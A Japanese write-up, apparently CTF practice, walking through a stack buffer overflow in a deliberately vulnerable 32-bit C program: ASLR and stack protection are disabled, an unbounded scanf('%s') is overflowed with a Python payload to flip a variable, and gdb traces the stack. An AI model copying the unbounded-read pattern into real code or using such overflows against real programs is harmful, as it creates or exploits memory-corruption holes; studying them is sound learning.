# スタックオーバーフロー

## 準備

単純なオーバーフローの実験をするために、下記のコマンドでALSRを無効にして、プログラムをコンパイルする。

```sh
$ sudo sysctl -w kernel.randomize_va_space=0
$ gcc -m32 -fno-stack-protector -no-pie -o 2 2.c
```

```c
     1	#include <stdio.h>
     2
     3
     4	int main(int argc, char *argv[]) {
     5	  int overflown;
     6	  char buf[16];
     7
     8	  printf("Input: ");
     9	  scanf("%s", buf);
    10
    11	  if (overflown == 0x11223344) {
    12	    printf("FLAG\n");
    13	  } else {
    14	    printf("%s\n", buf);
    15	  }
    16
    17	  return 0;
    18	}
```

## 目的

プログラムを実行して`FLAG`と表示させる。

## 実行

`FLAG`とは表示されず、入力した文字列の一部が出力された。

```sh
$ ./2
Input: Hello World↩
Hello
```

`scanf`を使用しているため、スペース以降は読み込まれなかった。

scanfの仕様は[ここ](https://linuxjm.osdn.jp/html/LDP_man-pages/man3/scanf.3.html)を参照。`man`コマンドでも確認できる。

```sh
$ man scanf
SCANF(3)

NAME
       scanf, fscanf, sscanf, vscanf, vsscanf, vfscanf - input format conversion

SYNOPSIS
       #include <stdio.h>

       int scanf(const char *format, ...);
       int fscanf(FILE *stream, const char *format, ...);
       int sscanf(const char *str, const char *format, ...);

...
```

## 実験

プログラムへの入力をわかりやすくするためにPythonを使用する。

`buf`の領域は16文字分あり、入力の長さが20になった段階でセグメンテーションフォルトが起きた。

```sh
$ python -c "print(b'A' * 15)" | ./2
Input: AAAAAAAAAAAAAAA
$ python -c "print(b'A' * 16)" | ./2
Input: AAAAAAAAAAAAAAAA
$ python -c "print(b'A' * 17)" | ./2
Input: AAAAAAAAAAAAAAAAA
$ python -c "print(b'A' * 18)" | ./2
Input: AAAAAAAAAAAAAAAAAA
$ python -c "print(b'A' * 19)" | ./2
Input: AAAAAAAAAAAAAAAAAAA
$ python -c "print(b'A' * 20)" | ./2
Input: AAAAAAAAAAAAAAAAAAAA
Segmentation fault (コアダンプ)
```

まず`main`関数が呼ばれる直前のスタックはこのようになっている。

|stack|
|:--:|
|mainの戻りアドレス|
|argc|
|argv|
|argv[1]|
|...|

そして変数`buf`が宣言された時点でスタックは次のようになっているはず。

(もし自分が何も考えていないコンパイラなら、`main`関数をパースする時に前の変数から順に領域を確保していく。つまり、`overflown`が`buf`よりもスタックの高位に位置するようになる。)

|stack|
|:--:|
|buf[0...3]|
|buf[4...7]|
|buf[8...11]|
|buf[12...15]|
|overflown|
|...|
|mainの戻りアドレス|
|argc|
|argv|
|argv[1]|
|...|
|高位|

`buf`と`overflown`のサイズは合わせて20バイトで、20文字の入力を与えてもセグメンテーションフォルトは起こらないように思える。

```c
sizeof(buf) = sizeof(char) * 16 = 1 bytes * 16 = 16 bytes
sizeof(overflown) = sizeof(int) = 4 bytes
```

はじめにプログラムを実行した時を思い返すと、`scanf`への入力はEnterキーで終えていた。もしかするとこれで改行文字`\n`が書き込まれたことが原因かもしれない。もしくは、`%s`を指定したがために、文字列の最後にヌル文字`\0`が書き込まれたのかもしれない。

実行結果とソースコードとを見比べると、Helloの後ろの改行は一つで、それは`printf`の第一引数の文字列`%s\n`の末尾の改行文字であることがわかる。

```sh
$ ./2
Input: Hello World↩
Hello
```

```c
    13	  } else {
    14	    printf("%s\n", buf);
    15	  }
```

改めて`scanf`の仕様を読むと、ヌル文字が自動的に追加されると明記されていた。

```sh
$ man scanf
...
       s      Matches a sequence of non-white-space characters;
	      the next pointer must be a pointer to the initial element of
	      a character array that is long enough to hold the input sequence and
	      the terminating null byte ('\0'), which is added automatically.
	      The input string stops at white space or at the maximum field width,
	      whichever occurs first.
...
```

したがって`overflown`の領域を超えて書き込まれた21バイト目はヌル文字`\0`で、これがセグメンテーションフォルトの原因だった。


今回、`FLAG`と表示させるためには、オーバーフローを起こして`buf`の次に位置するであろう`overflown`の値を書き換えることで、11行目のif文の条件を満たし、12行目を実行させる必要がある。

```c
    11	  if (overflown == 0x11223344) {
    12	    printf("FLAG\n");
    13	  } else {
```

まずはプログラムのバイトオーダーを調べる。`LSB`の記述からリトルエンディアンであると分かる。

```sh
$ file 2
2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6a3205dcf4ba0f14ef1afab24a4e7e88d3ef3568, not stripped
```

つまり`overflown`に入るべき値`\x11\x22\x33\x44`は、メモリ内でこのように配置される。

低位 <--> 高位

|memory|...|\x44|\x33|\x22|\x11|...|
|:-|:-:|:-:|:-:|:-:|:-:|:-:|

したがってスタックオーバーフローを起こした時のスタックの状態は、このようになる必要がある。

|stack|
|:--:|
|...|
|buf[3...0]|
|...|
|buf[15...12]|
|\x44\x33\x22\x11|
|...|

よって次のような入力を与えることで`overflown`を書き換える。

```sh
$ python -c "print(b'A' * 16 + b'\x44\x33\x22\x11')" | ./2
Input: FLAG
Segmentation fault (コアダンプ)
```

やはり`scanf`によるヌル文字の書き込みは避けられないため、セグメンテーションフォルトはどうしても起きてしまうが、今回の目的は達成された。

## 検証

はじめにスタックの中身がどうなっているかを予想したが、実際にはどうなっているのかを確かめる。

まず先程のプログラムをgdbでデバッグしやすいようにコンパイルし直す。

```sh
$ gcc -g -m32 -fno-stack-protector -no-pie -o 2-1 2.c
```

最初に`main`関数が呼び出された直後のスタックを確認する。そのために`objdump`コマンドで`main`関数が始まるアドレスを調べる。

```sh
$ objdump -d 2-1 | grep main
08048360 <__libc_start_main@plt>:
 80483ac:	e8 af ff ff ff       	call   8048360 <__libc_start_main@plt>
08048486 <main>:
 80484d2:	75 14                	jne    80484e8 <main+0x62>
 80484e6:	eb 0f                	jmp    80484f7 <main+0x71>
```

`main`関数は`0x08048486`から実行されることが分かったので、gdbを起動してこのアドレスにブレークポイントを張る。

```sh
$ gdb 2-1
GNU gdb (Ubuntu 8.0.1-0ubuntu1) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from 2-1...done.
(gdb) break *0x08048486
Breakpoint 1 at 0x8048486: file 2.c, line 4.
```

次にそのアドレスまで処理を進め、`main`が呼び出された直後のスタックを確認する。

```sh
(gdb) run
Starting program: /home/q2ven/workspace/ctf/pwn/2/2-1

Breakpoint 1, main (argc=1, argv=0xffffce94) at 2.c:4
4	int main(int argc, char *argv[]) {
(gdb) x/20x $esp
0xffffcdfc:	0xf7df9986	0x00000001	0xffffce94	0xffffce9c
0xffffce0c:	0x00000000	0x00000000	0x00000000	0xf7fb0000
0xffffce1c:	0xf7ffdc0c	0xf7ffd000	0x00000000	0x00000001
0xffffce2c:	0xf7fb0000	0x00000000	0x87b9068d	0xc7178a9d
0xffffce3c:	0x00000000	0x00000000	0x00000000	0x00000001
```

`main (argc=1, argv=0xffffce94)`に注目すると、`argc`と`argv`はそれぞれ`0xffffce00`と`0xffffce04`(2番目と3番目)に格納されていることが分かる。そして先頭`0xffffcdfc`に格納されている`0xf7df9986`が`main`関数の戻りアドレスである。

次に変数宣言後(7行目)で実行を止めてスタックを確認する。

```sh
(gdb) break 7
Breakpoint 2 at 0x80484a3: file 2.c, line 7.
(gdb) continue
Continuing.

Breakpoint 2, main (argc=1, argv=0xffffce94) at 2.c:8
8	  printf("Input: ");
(gdb) x/20x $esp
0xffffcdc0:	0x00000001	0x00040000	0x00000001	0x0804855b
0xffffcdd0:	0x00000001	0xffffce94	0xffffce9c	0x08048531
0xffffcde0:	0xffffce00	0x00000000	0x00000000	0xf7df9986
0xffffcdf0:	0x00000001	0xf7fb0000	0x00000000	0xf7df9986
0xffffce00:	0x00000001	0xffffce94	0xffffce9c	0x00000000
```

戻りアドレスは16番目に位置しており、15ワード分の領域が新たに確保されている。

最後に文字を入力し終わった時点(10行目)を見てみる。

```sh
(gdb) break 10
Breakpoint 3 at 0x80484d2: file 2.c, line 10.
(gdb) continue
Continuing.
Input: AAAAAAAAAAAAAAAA

Breakpoint 3, main (argc=1, argv=0xffffcea4) at 2.c:11
11	wn == 0x11223344) {
(gdb) x/20x $esp
0xffffcdc0:	0x00000001	0x00040000	0x00000001	0x41414141
0xffffcdd0:	0x41414141	0x41414141	0x41414141	0x08048500
0xffffcde0:	0xffffce00	0x00000000	0x00000000	0xf7df9986
0xffffcdf0:	0x00000001	0xf7fb0000	0x00000000	0xf7df9986
0xffffce00:	0x00000001	0xffffce94	0xffffce9c	0x00000000
```

入力には16文字のAを与えた。AはASCIIコードで`41`だから、`buf`はスタックの4番目から7番目に位置しているとわかる。

また、8番目の値の最下位バイトが`31`から`00`へと変わっていることが見て取れ、仕様通りに`scanf`のヌル文字が自動的に書き込まれていることも分かった。(`overflown`は初期化していないので、実行するたびに該当部分の初期値が変わる可能性がある。もし最初の値の最下位バイトが`00`の場合は変化を確認できないが、その時はもう一度gdbでrunし直せば良い。)

次にセグメンテーションフォルトが起きた原因を探っていく。セグメンテーションフォルトを起こすには20文字以上の入力を与えれば良い。

`main`関数呼び出し前では、`main`の戻りアドレスや`argc`などは`0xffffce0c`に位置している。これが入力前にはやはり16番目になっている。

```sh
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/q2ven/workspace/ctf/pwn/2/2-1

Breakpoint 1, main (argc=1, argv=0xffffcea4) at 2.c:4
4	int main(int argc, char *argv[]) {
(gdb) x/20x $esp
0xffffce0c:	0xf7df9986	0x00000001	0xffffcea4	0xffffceac
0xffffce1c:	0x00000000	0x00000000	0x00000000	0xf7fb0000
0xffffce2c:	0xf7ffdc0c	0xf7ffd000	0x00000000	0x00000001
0xffffce3c:	0xf7fb0000	0x00000000	0xfbc5fec7	0xbb6b52d7
0xffffce4c:	0x00000000	0x00000000	0x00000000	0x00000001
(gdb) continue
Continuing.

Breakpoint 2, main (argc=1, argv=0xffffcea4) at 2.c:8
8	  printf("Input: ");
(gdb) x/20x $esp
0xffffcdd0:	0x00000001	0x00040000	0x00000001	0x0804855b
0xffffcde0:	0x00000001	0xffffcea4	0xffffceac	0x08048531
0xffffcdf0:	0xffffce10	0x00000000	0x00000000	0xf7df9986
0xffffce00:	0x00000001	0xf7fb0000	0x00000000	0xf7df9986
0xffffce10:	0x00000001	0xffffcea4	0xffffceac	0x00000000
```

実行を進めて20文字以上の入力を与える。22文字のABCDABCDABCDABCDABCDABという文字列を入力した。リトルエンディアンなので`ABCD`が1ワード毎に`\x44\x43\x42\x41`となっている。
そしてさっきまでは無かったメッセージが表示されている。

```sh
(gdb) continue
Continuing.
Input: ABCDABCDABCDABCDABCDAB

Breakpoint 3, main (argc=<error reading variable: Cannot access memory at address 0xff004241>, argv=<error reading variable: Cannot access memory at address 0xff004245>) at 2.c:11
11	  if (overflown == 0x11223344) {
(gdb) x/20x $esp
0xffffcdd0:	0x00000001	0x00040000	0x00000001	0x44434241
0xffffcde0:	0x44434241	0x44434241	0x44434241	0x44434241
0xffffcdf0:	0xff004241	0x00000000	0x00000000	0xf7df9986
0xffffce00:	0x00000001	0xf7fb0000	0x00000000	0xf7df9986
0xffffce10:	0x00000001	0xffffcea4	0xffffceac	0x00000000
```

どうも`argc`の該当メモリを読み出そうとした時にエラーが出たらしく、`argc`のアドレスが`0xff004241`と認識されている。また、`argv`を`0xff004245`へアクセスすることで読み取ろうとしている。

この部分は元々は`0xffffce10`で、入力の最後のABと`scanf`によるヌル文字で一部が上書きされている。

|stack|0xffffcdf0|0xffffcdf1|0xffffcdf2|0xffffcdf3|
|:-|:-:|:-:|:-:|:-:|
|入力前|\xff|\xff|\xce|\x10|
|入力後|\xff|\x00|\x42|\x41|

元のアドレスは以下の2行目の先頭部分で、`1`が入っている。その前には`0xf7df9986`という値が入っており、これは`main`関数の戻りアドレスであった。

```sh
0xffffce00:	0x00000001	0xf7fb0000	0x00000000	0xf7df9986
0xffffce10:	0x00000001	0xffffcea4	0xffffceac	0x00000000
```

そして`0xff004241`に`4`を足して`argv`を読み出そうとしたことから、上書きした部分に入っていたのは`argc`格納されるアドレスだと分かる。

これを存在しない値で上書きしてしまったがために、アドレスにアクセスできず、セグメンテーションフォルトが起きていた。

なぜこのタイミングで`argc`を読み出そうとしたのかについては気が向いたら調べる。